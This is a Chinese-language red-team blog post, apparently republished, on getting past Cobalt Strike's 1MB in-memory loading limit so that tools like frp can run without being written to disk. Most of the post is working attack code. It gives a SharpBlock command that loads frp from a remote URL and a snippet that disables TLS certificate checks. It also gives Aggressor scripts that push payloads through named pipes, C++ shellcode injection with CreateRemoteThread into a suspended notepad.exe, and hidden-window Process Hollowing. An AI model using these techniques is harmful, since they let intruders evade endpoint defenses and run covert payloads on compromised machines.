Bypass Cobalt Strike 1MB
2022-1-14 17:45:50 Author: mp.weixin.qq.com(查看原文) 阅读量:9 收藏

0x00 前言

在攻防中经常会使用到frp,HackBrowserData等工具,常规的落地使用远不如在内存中直接加载省事/OPSEC,但因inject/execute-assembly等有着1mb的限制,所以需要另辟蹊径

0x01 利用现有工具

SharpBlock(需要.net4.0)

1.远程加载
execute-assembly SharpBlock.exe -e https://image.com/frp -s c:\windows\system32\notepad.exe -a "-c c:\frpc.ini" --disable-bypass-amsi --disable-bypass-cmdline --disable-bypass-etw

注意 image 中因为是用了cna的方式,所以-a 参数时因为frpc的参数为 -c" "xxx.ini 所以你需要给空格包裹一下,如果你是execute-assembly那就没有这个问题了。另外这是ini落地的写法,如果你已经将frp修改为了无参数启动那就是一键一把梭了。

加入下面的代码以支持https

ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;
2.named pipe

原版的SharpBlock因frp等文件太大,导致Payload传输不完整。其原因还是CS本身单次传输数据大小的问题,且原版SharpBlock只接收一次数据就会关闭管道,所以也不太适合大文件的使用

此处使用秋水fix过的版本

https://github.com/Like0x/SharpBlock

可以看到这是一个接近4M的PE文件。

使用pipe传输,无落地直接执行,修改项目中提供的cna即可

0x02 C++ named pipe

因.net 4.0在实战中还是会碰到缺失的情况,所以用c++改了一份

2.1 实现

1.修改微软的example为RDI
https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipe-server-using-completion-routines
2.确认Payload是否传输完成

秋水使用的方式是在Payload传输完后发送ok作为标识符,关闭pipe进入下一步

alias frp {    $handle = openf(script_resource("frpc_windows_x64.exe"));    $data = readb($handle,-1);    closef($handle);
    bupload_raw($bid,"\\\\.\\pipe\\pipename",base64_encode($data));
    # This code turn off Pipeserver    for ($total = 0; $total < 5; $total++)    {        bpause($bid,100);        bupload_raw($bid,"\\\\.\\pipe\\pipename","ok");    }}

我选择使用cna计算Payload的大小,传参给DLL

alias test {    $handle = openf(script_resource("frpc_windows_x64.exe"));  $data = readb($handle, -1);  closef($handle);  $size = strlen($data);  blog($1,"file size ".$size);  bdllspawn($1,script_resource("pipe.dll") , $size, "", 1000, false);}
size = atoi((char*)lpReserved);
recv_total += cbBytesRead;memcpy(temp, lpPipeInst->chRequest, cbBytesRead);temp += cbBytesRead;if (recv_total == size){printf("[loader] recv all %02d bytes\r\n", recv_total);
3.传输完成后关闭pipe结束进程
DisconnectNamedPipe(hPipe);

2.2 inject

1.frpc pe2shellcode


https://github.com/TheWover/donut

2.Demo

常规的CreateRemoteThread测试

recv_total += cbBytesRead;memcpy(temp, lpPipeInst->chRequest, cbBytesRead);temp += cbBytesRead;if (recv_total == size){    printf("[loader] recv all %02d bytes\r\n", recv_total);    PROCESS_INFORMATION pi = { 0 };    STARTUPINFO si = { 0 };    CreateProcess(NULL, "notepad.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);    remoteBuffer = VirtualAllocEx(pi.hProcess, NULL, recv_total + 1, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);    WriteProcessMemory(pi.hProcess, remoteBuffer, shellcode, recv_total, NULL);    remoteThread = CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);    CloseHandle(processHandle);    DisconnectNamedPipe(hPipe);
}

https://github.com/dust-life/Tools/tree/main/Named_Pipe

2.3 run_pe

考虑到pe2shellcode有诸多不便,选择使用Process Hollowing并稍作修改

https://github.com/hasherezade/libpeconv/tree/master/run_pe
1.从内存加载Payload
BYTE* memory_load(IN BYTE* payload, IN size_t r_size, OUT size_t& v_size, bool executable, bool relocate){    BYTE* mappedPE = load_pe_module(payload, r_size, v_size, executable, relocate);    free_pe_buffer(payload);    return mappedPE;}
2.隐藏窗口
if (!CreateProcessA(        path,        (LPSTR)cmdLine,        NULL, //lpProcessAttributes        NULL, //lpThreadAttributes        FALSE, //bInheritHandles        CREATE_SUSPENDED | DETACHED_PROCESS | CREATE_NO_WINDOW, //dwCreationFlags        NULL, //lpEnvironment         NULL, //lpCurrentDirectory        &si, //lpStartupInfo        &pi //lpProcessInformation))
3.忽略修复重定位表

upx过后的PE没有重定位表,所以需要忽略修复重定位表

if (!relocate_module(loaded_pe, payloadImageSize, (ULONGLONG)remoteBase)) {    std::cout << "Could not relocate the module!\n";    //3. Update the image base of the payload (local copy) to the Remote Base:    update_image_base(loaded_pe, (ULONGLONG)remoteBase);}else{    update_image_base(loaded_pe, (ULONGLONG)remoteBase);}
4.Demo

https://github.com/dust-life/run_pe
0x03 TODO
1.Bypass CmdlineETW2.更好的Process Hollowing3.BOF版远程加载、Process Hollowing

文章来源: https://mp.weixin.qq.com/s?__biz=MzkyMjMxOTI2MA==&mid=2247483671&idx=1&sn=d00e0d5daad992012746b6b3c6c38dbc&chksm=c1f761e4f680e8f2a21b45397948422d2f9b8ea577783cf4955298678f2fb7c410a9f0bd10fd&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh